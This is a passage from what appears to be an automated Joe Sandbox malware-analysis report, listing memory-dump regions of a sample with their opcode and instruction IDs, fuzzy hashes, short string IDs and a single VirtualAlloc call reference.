                                                                        • Opcode ID: a3c236f980ec4d7fa46601fffe888b75d7dbf2cc0542b52fad03583e0e529abd
                                                                        • Instruction ID: 3412f4c709e24e884b454dd211872a3a69c912c57365ad96987016c64a51034c
                                                                        • Opcode Fuzzy Hash: a3c236f980ec4d7fa46601fffe888b75d7dbf2cc0542b52fad03583e0e529abd
                                                                        • Instruction Fuzzy Hash: 5841C031A0021ACFCB00CF28C484A6AFBB1FF49324F25969AD965AB381C730F951CBD4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q
                                                                        • API String ID: 0-1614139903
                                                                        • Opcode ID: 62c5969e5041f017a89df0fce5187e05043de522ba8369f28263440593b605ae
                                                                        • Instruction ID: 8a10a6e1ceecf9b0f6a9ddee1bf21be2f466ab7dfbcaef52eecd6bbaca8bc60f
                                                                        • Opcode Fuzzy Hash: 62c5969e5041f017a89df0fce5187e05043de522ba8369f28263440593b605ae
                                                                        • Instruction Fuzzy Hash: D2314E357406149FD308EB69C968F2ABBA6AFC8714F118458E1068B3A5DE75EC42C7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q
                                                                        • API String ID: 0-1614139903
                                                                        • Opcode ID: 11a86286b725e3be9cea607fa17f261aa7d75ac955b8c006fe83cda132b376be
                                                                        • Instruction ID: 425493e73c57c98492f832e165e1caeed4d83166db0aaadf3be6be6e3dd39964
                                                                        • Opcode Fuzzy Hash: 11a86286b725e3be9cea607fa17f261aa7d75ac955b8c006fe83cda132b376be
                                                                        • Instruction Fuzzy Hash: 65313E357406149FD308EB69C968F2AB7E6AFC8714F104468E5068F3A5DF75EC42C7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 05C0E85F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650051244.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5c00000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: b09c6295f3878c2203551424488d9cf18257e503926d706ba778cc723c4ae259
                                                                        • Instruction ID: 9f4f9712d3855cc07bc791cceb52a64ac248cf92d5295f505502de762cb7fce0
                                                                        • Opcode Fuzzy Hash: b09c6295f3878c2203551424488d9cf18257e503926d706ba778cc723c4ae259
                                                                        • Instruction Fuzzy Hash: 0831B8B8D002589FCF10CFA9D884ADEFBB5BB49320F24942AE815B7210C735A945CF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q
                                                                        • API String ID: 0-1614139903
                                                                        • Opcode ID: efc88823d7531113414864bc01c9d3f061611a5db1c408e83422a2ab90c8cddc
                                                                        • Instruction ID: 30c42cb4b54a5d3c6aabbb5edfcb8e3d665211a36af0661ab8e67ffd7da5d3b9
                                                                        • Opcode Fuzzy Hash: efc88823d7531113414864bc01c9d3f061611a5db1c408e83422a2ab90c8cddc
                                                                        • Instruction Fuzzy Hash: C33195367001099FCB05AF94C858D5ABBB7FF88310B1540A9E9069B3B5DA75EC46CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q
                                                                        • API String ID: 0-1614139903
                                                                        • Opcode ID: 8394b230550b44c618c720b7c9dda920f4e4d824fd6d05840250b2386f48b22a
                                                                        • Instruction ID: 43646642a2e3175cbf21ce6141e78b8bf82dbb4d30848f84b6190363214ab678
                                                                        • Opcode Fuzzy Hash: 8394b230550b44c618c720b7c9dda920f4e4d824fd6d05840250b2386f48b22a
                                                                        • Instruction Fuzzy Hash: CE217531B002199BCB14BB55C458AAEFBBBABC9610F50441ED507EB394CF789C06D7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: p`^q
                                                                        • API String ID: 0-26641872
                                                                        • Opcode ID: b656970b7bfcdfb11999e692c0b164050f852795a54c22fe02c6e877b281e4a2
                                                                        • Instruction ID: ad0c7d962e77e6fd15c845a1983117765df89b38db11c203324d4ac8579eadca
                                                                        • Opcode Fuzzy Hash: b656970b7bfcdfb11999e692c0b164050f852795a54c22fe02c6e877b281e4a2
                                                                        • Instruction Fuzzy Hash: 7F31A736E0121A8FCB10DF94D889EAEFBB1FB44750F144529E512A7261E734AA45CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648735395.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_59b0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q
                                                                        • API String ID: 0-1614139903
                                                                        • Opcode ID: cd4b04ead29e779f08c60f952ad18fa2d84385eed3d73284e3446259dac5625d
                                                                        • Instruction ID: 2247af19747dcf8591f8168c3ef744f8741ddee22c25b72555344542aa9c431e
                                                                        • Opcode Fuzzy Hash: cd4b04ead29e779f08c60f952ad18fa2d84385eed3d73284e3446259dac5625d
                                                                        • Instruction Fuzzy Hash: E7314975D04209CFEF08CFA9C5546EEBBB2FF85301F14846AC015AB260DB745A46CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648735395.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_59b0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q
                                                                        • API String ID: 0-1614139903
                                                                        • Opcode ID: 285a52c289cb20ce0504ab68dfa71b2f11fbdfc69e25b9fd0ec56adb8727a920
                                                                        • Instruction ID: 9a7b5c20cb568608f6e56fd7bd8264c6833d5a1003ab708bdd38c60c01a1fc61
                                                                        • Opcode Fuzzy Hash: 285a52c289cb20ce0504ab68dfa71b2f11fbdfc69e25b9fd0ec56adb8727a920
                                                                        • Instruction Fuzzy Hash: 66318B34D04209CFEB19CFA9C6196EEBBB2FB85301F10846AD011A7291DB746A46CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: p<^q
                                                                        • API String ID: 0-1680888324
                                                                        • Opcode ID: 6d4ec71e2c7b75ec3810444c5551adf2024349ff28e4a197344fe4a92790403a
                                                                        • Instruction ID: 487696cb24f49ef4858ff27dfaefa29bec276aae90e27d74508885b92764e231
                                                                        • Opcode Fuzzy Hash: 6d4ec71e2c7b75ec3810444c5551adf2024349ff28e4a197344fe4a92790403a
                                                                        • Instruction Fuzzy Hash: 0E2157703041849FCB01DF2AC854EAABBEABF8A210B044496FC66CB361CA31EC51CB31
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: p<^q
                                                                        • API String ID: 0-1680888324
                                                                        • Opcode ID: f8243f92c347e3dbcf753d052a8d9f95bc0d1eda4bd34183aea5a948f499215f
                                                                        • Instruction ID: 03e9e0ee1c051160664f82ad8f3e0c6073ca987726e96b9cf3fea09076dc4cfa
                                                                        • Opcode Fuzzy Hash: f8243f92c347e3dbcf753d052a8d9f95bc0d1eda4bd34183aea5a948f499215f
                                                                        • Instruction Fuzzy Hash: FD2158713041949FCB15DF2AC854EAABBF6BF8E210B158496F85ACB371CA31DC52CB21
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,bq
                                                                        • API String ID: 0-2474004448
                                                                        • Opcode ID: ad2c0f54577e6105eff6543c111c31b09c6d75f101392d84828f9db2557b2986
                                                                        • Instruction ID: dd70781b747aa6188ba52b1566fddcbd06bc9e669dcba9d9413cb2a3c25e552f
                                                                        • Opcode Fuzzy Hash: ad2c0f54577e6105eff6543c111c31b09c6d75f101392d84828f9db2557b2986
                                                                        • Instruction Fuzzy Hash: F6117C35A401058FCB04DF69C898AAEBBF6FF85310F248065E906DB361DB30EC01CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8bq
                                                                        • API String ID: 0-187764589
                                                                        • Opcode ID: 5971d3b7674a50f1af901f0d9b6d62f6ef7662af58660222bbddd85b6b987ef4
                                                                        • Instruction ID: adeabaaf250ce89646906c48797e0a986e579e3f2b53d766f512c44f70c53755
                                                                        • Opcode Fuzzy Hash: 5971d3b7674a50f1af901f0d9b6d62f6ef7662af58660222bbddd85b6b987ef4
                                                                        • Instruction Fuzzy Hash: F001F575B042049FD308976DE458B7A7BA6FBCA750F00446AE10ACB3A9DB798C46CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8bq
                                                                        • API String ID: 0-187764589
                                                                        • Opcode ID: 4eface02f4e9447926bcb32514b885698258d88654e14211daaec50e1467533e
                                                                        • Instruction ID: 3368ff686f053797102ce3026bbfc4876089f2409bd07d0b2631a8c1ba8e9801
                                                                        • Opcode Fuzzy Hash: 4eface02f4e9447926bcb32514b885698258d88654e14211daaec50e1467533e
                                                                        • Instruction Fuzzy Hash: E601A2357041089FD308A76DE558B7A77DAF7C9755F004425E20ACB3A8DB75DC41CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #
                                                                        • API String ID: 0-1885708031
                                                                        • Opcode ID: 8e0068f479d5ef3018c3a96ff7fe49eb05d069f5e968944df1e14d91d9e63858
                                                                        • Instruction ID: d5bcb3a8a0736276df682f157a95136abf36e04df6385d54c75538bb18c210c5
                                                                        • Opcode Fuzzy Hash: 8e0068f479d5ef3018c3a96ff7fe49eb05d069f5e968944df1e14d91d9e63858
                                                                        • Instruction Fuzzy Hash: B201B23490420CDFEB20DFA4D488BAD7BB6FF09305F1450A5E55AAB290CB75A9C8CF11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: {
                                                                        • API String ID: 0-366298937
                                                                        • Opcode ID: a24200c20593aeea6d49a90bafcc8b0c58eef33e3eeb026fd78974173913557c
                                                                        • Instruction ID: 083277f8f37c682fa77f7a44fedc1a8bc5401aacefb9bd07ef33cd32f05aa69d
                                                                        • Opcode Fuzzy Hash: a24200c20593aeea6d49a90bafcc8b0c58eef33e3eeb026fd78974173913557c
                                                                        • Instruction Fuzzy Hash: 3CF0A0B0604249DFCB11CF48DDAD7AEBBB0FB05755F500659D4019F2AAC778AC8ACB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: G
                                                                        • API String ID: 0-985283518
                                                                        • Opcode ID: 41febf8feeb9c7804993e1b892e94760c1fcae8330ab33a77b1da340accfe9f1
                                                                        • Instruction ID: a4dfd9ec457a3a9fb7a04b86d14e29555ed5b98cf04a649d8cfe301fd455c9b4
                                                                        • Opcode Fuzzy Hash: 41febf8feeb9c7804993e1b892e94760c1fcae8330ab33a77b1da340accfe9f1
                                                                        • Instruction Fuzzy Hash: DBF06C74D0621CCFDB64DFA8D489AACBBB2BB09310F2044A9E909BB250DB346980DF15
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "
                                                                        • API String ID: 0-123907689
                                                                        • Opcode ID: f1316f283f5db59a0daa0c61274fa4ffaaeda38e6a342580744ede82d12e969b
                                                                        • Instruction ID: 691e1a2aa3648e683ef0a642b1d3b724b48235f90968a5a5669c6e9b8e257541
                                                                        • Opcode Fuzzy Hash: f1316f283f5db59a0daa0c61274fa4ffaaeda38e6a342580744ede82d12e969b
                                                                        • Instruction Fuzzy Hash: 40E07E74E00129CBDB60CFA5D848BADFBB1FB48300F00D5AB985AB7385EB3469458F90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b1a05e3a80d5e8c6cbe2d426c24d9077e962dcbe583f794d6e491b92284700e0
                                                                        • Instruction ID: c151de6e34d95f99f7693ce3bd2fd2567b75187bbd1b519e208947bae491ef48
                                                                        • Opcode Fuzzy Hash: b1a05e3a80d5e8c6cbe2d426c24d9077e962dcbe583f794d6e491b92284700e0
                                                                        • Instruction Fuzzy Hash: E212C834A102198FCB14EF64C994AADBBB2BF89300F5185A8E54AAB355DF34ED85CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ee641baef7d3a15f69b5dc4753e03db38f312bc10ccb39ee56841ecd6c51b59
                                                                        • Instruction ID: b9023a2365105c690fa0dd2aca5576427e0095bbca5cf537025f45b46b3b7e39
                                                                        • Opcode Fuzzy Hash: 4ee641baef7d3a15f69b5dc4753e03db38f312bc10ccb39ee56841ecd6c51b59
                                                                        • Instruction Fuzzy Hash: 82C19131B046588FCB29CF29C454A2ABBF2FF85314F29859DE4978B691DB34F841CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: af551b34d38fd6344de9be450ce55c0abb0e4e4aab6fbd7ac00cd7402261edd3
                                                                        • Instruction ID: ad06e15efd3d22d55b959bcd740dd1ca7d3a1aedc20dbdddb63565ce615aecd7
                                                                        • Opcode Fuzzy Hash: af551b34d38fd6344de9be450ce55c0abb0e4e4aab6fbd7ac00cd7402261edd3
                                                                        • Instruction Fuzzy Hash: 8F719332B001189FCB15EF64D854E9DBBB2FF89320F4580A5E50AAB261C735ED56CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d39ae83ea20a38988c4a8bdef059e62b1be1d1c9e4cd1a1f593e7fa6a37de525
                                                                        • Instruction ID: 1d83fe97882ca717f8acae2f019018a9de2d2e07586bded027aec98683dc5f2d
                                                                        • Opcode Fuzzy Hash: d39ae83ea20a38988c4a8bdef059e62b1be1d1c9e4cd1a1f593e7fa6a37de525
                                                                        • Instruction Fuzzy Hash: BB915735B012049FCB04DFA5E599EADBBB2FF88311F248069E9129B391DB75ED41CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cfd52a42d12accfab3bc13760e2c762016f34f3c71e960342d7b04f9d9c3dd40
                                                                        • Instruction ID: b8ee83477dcabba59c56bfd622473073d009a56eb85687aac0f7a19026b42f84
                                                                        • Opcode Fuzzy Hash: cfd52a42d12accfab3bc13760e2c762016f34f3c71e960342d7b04f9d9c3dd40
                                                                        • Instruction Fuzzy Hash: 20B10774E05218CFDB54DFA4D888BADBBB6FB89300F10A0A9E419A7395DB746D85CF40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 187787284c6fe85d7db8822a11364d5e35f7839187e9822c96bbb97cf3bd5573
                                                                        • Instruction ID: f60ec62d6062676c3b4a999978936a6e4b994b552ef0ee05925597047d56d466
                                                                        • Opcode Fuzzy Hash: 187787284c6fe85d7db8822a11364d5e35f7839187e9822c96bbb97cf3bd5573
                                                                        • Instruction Fuzzy Hash: BEB10774E05218CFDB54DFA8D898BADBBB6FB89300F1090A9E419A7395CB746D85CF40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 29cc66d8a9cd1eb0626dd5f7f021ee28ec50276edc0a363a21a665498d4b2146
                                                                        • Instruction ID: bd63d6603e2c4ebe0245f072abf6b9eea2cffc584075575564bc12f83531733b
                                                                        • Opcode Fuzzy Hash: 29cc66d8a9cd1eb0626dd5f7f021ee28ec50276edc0a363a21a665498d4b2146
                                                                        • Instruction Fuzzy Hash: FBA1ED34B002198FCB14EF24C998B99B7B2BF89300F5185A8E54AAB355DF75ED85CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cbc6aab4e80a5724bfbf817844c980621d748464544e476e3541a996c8408f18
                                                                        • Instruction ID: 430e53e3b9e85f0b591ee9c0787ceff75f7be647ba0162329b8156bede207ae6
                                                                        • Opcode Fuzzy Hash: cbc6aab4e80a5724bfbf817844c980621d748464544e476e3541a996c8408f18
                                                                        • Instruction Fuzzy Hash: BBA16E31E0011A9FCF15EFA5D555EFDFBB1BB08300F148416E862A7285DB38A946CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e5d560d9053f3da42c697d42f2837b17731c7c10153b1c008c09a8a7f6a4c6a
                                                                        • Instruction ID: 9e6d9e260aaa53fae9cdc8aa51e5fb1d30c53601222a8ec3e9f40a8cbc34a654
                                                                        • Opcode Fuzzy Hash: 3e5d560d9053f3da42c697d42f2837b17731c7c10153b1c008c09a8a7f6a4c6a
                                                                        • Instruction Fuzzy Hash: CCA10074E05218CFDB54DFA8E998AADBBF6FB89300F1090A9E419A7350DB34AD45CF44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c4922a0415e157f93bc0d43742e06be1a2c30109283ce64856e461390f4e31ce
                                                                        • Instruction ID: d9dbe39b09ba83714e78be60787b8dee00f78f17a161373cd9b900ec791f256b
                                                                        • Opcode Fuzzy Hash: c4922a0415e157f93bc0d43742e06be1a2c30109283ce64856e461390f4e31ce
                                                                        • Instruction Fuzzy Hash: CB913935B101149FCB14EF68D998EAEBBB6BF89710F144169E5169F3A1CB34EC41CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 635d4a67495f95afa5bcb65b6b18f7fd19524a83b0cd510a45a3bffb82e0b41b
                                                                        • Instruction ID: 53da86fdf5bae95d74b2729ddd706932c4ed356974b1f94c23336d423ef49d96
                                                                        • Opcode Fuzzy Hash: 635d4a67495f95afa5bcb65b6b18f7fd19524a83b0cd510a45a3bffb82e0b41b
                                                                        • Instruction Fuzzy Hash: 5BB1F774A05218CFDB50DFA4E899BADBBB6FB89300F1090A9D419A7394CB746D85CF41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 619545ffd4de4b9dd14aab8095bc79476f7ced5b74bbfa77ece20930a78aa4ee
                                                                        • Instruction ID: 0801a7cb38977ce9f9b2a5bc99bc0a0b2532dfcea6d7303b391058a5eb9d256d
                                                                        • Opcode Fuzzy Hash: 619545ffd4de4b9dd14aab8095bc79476f7ced5b74bbfa77ece20930a78aa4ee
                                                                        • Instruction Fuzzy Hash: 6EA1E674A05218CFDB54DFA4E888BADBBB6FB89300F1090A9E419A7395DB346D85CF40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 57b10c8c3c182fb841966d72c22a73acce1b37d9b160362561c8d5d8474d856c
                                                                        • Instruction ID: a4f79cd8e3b386f7d19cc401bcaba7ed81d1fd9d848dbf8378c6445e210bc938
                                                                        • Opcode Fuzzy Hash: 57b10c8c3c182fb841966d72c22a73acce1b37d9b160362561c8d5d8474d856c
                                                                        • Instruction Fuzzy Hash: B491D370D4960CCBEB10CFA9D445BEDBBF6FB09304F1494AAD425A7281C3B96989EF01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
